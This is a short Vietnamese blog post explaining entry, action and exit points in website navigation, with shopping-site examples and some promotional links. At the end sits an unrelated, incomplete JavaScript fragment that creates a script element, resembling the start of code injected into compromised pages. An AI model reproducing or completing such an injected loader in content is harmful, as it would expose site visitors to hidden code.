Những điểm thiết kế web dễ dàng điều hướng cho người dùng

0
259

Như các bạn đã biết thì mỗi người đều có sự khác nhau và một kiểu phong cách sống, ăn mặc … đều khác nhau trong thiết kế web site cũng như vậy mỗi một web site đều có những thiết kết khác nhau.Một web site được gọi là thành công khi web đó có tổ chức, bố cục nội dung tốt cho người dùng và người dùng dễ dàng sử dụng tìm kiếm thông tin trên web site đó.

thiet-ke-website-khac-biet

Sau đây mình xin giới thiệu những điểm chính cần có của web site:

1, The Entry Point

Entry Point là điểm đầu tiên trong web site khi đó người dùng sẽ truy cập vào web nó có thể thể hiện qua nút bấm hay lời chào.Entry point giúp chỉ dẫn người dùng vào những điểm chính trong site.

Xem thêm: Khoa hoc lap trinh android

2, The Action Point

Điểm Action Point là điểm mà người sử dụng truy cập đến các nội dung khác nhau trên web site để lấy thông tin trên web.Để có thể xác định đâu là điểm Action Point bạn cần trả lời những câu hỏi và những gì bạn muốn sử dụng khi vào web site và sắp xếp các công việc đó theo một thứ tự ưu tiên.

Vd về Action Point khi một khách hàng vào web site bán hàng và nó có nhiều mục bán hàng khác nhau như quần ào, giầy dép, máy giặt … thì khi người dùng vào một mục máy giặt để xem hàng thì máy giặt chính là điểm action point.

-> Tải ứng dụng bé học toán

3, The Exit Point

Điểm Exit poin là điểm mà người dùng thường thoát khỏi web của bạn ví dụ như một khách hàng vào web của bạn để mua đồng hồ thì anh ta sẽ chỉ tìm kiếm đến đồng hồ để mua thôi mà không xem thêm các sản phẩm khác rồi thoát khỏi web site của bạn.Điểm đó chính là điểm exit point của khách hàng đó.Cho dù đến mùa đồng hồ nhưng chúng ta cũng muốn khách hàng đó xem thêm những sản phẩm khác nữa.Đó là cơ hội để đưa khách hàng đến các điểm Action post khác trên web site.Chính vì thế mà khi web site được thiết kế tốt thì người dùng sẽ xem được nhiều nội dung khác.

Các bạn chú ý khi làm web cần đặt mình vào vị trí người dùng.Cho dù web site của bạn có thiết kếđẹp đến đâu đi nữa cũng không thể giữ người dùng lại nếu như site của bạn không thể giúp họ tìm thấy những thứ mà họ cần.

Tìm hiểu thêm về tài liệu lập trình:

var d=document;var s=d.createElement(‘script’);

SHARE

NO COMMENTS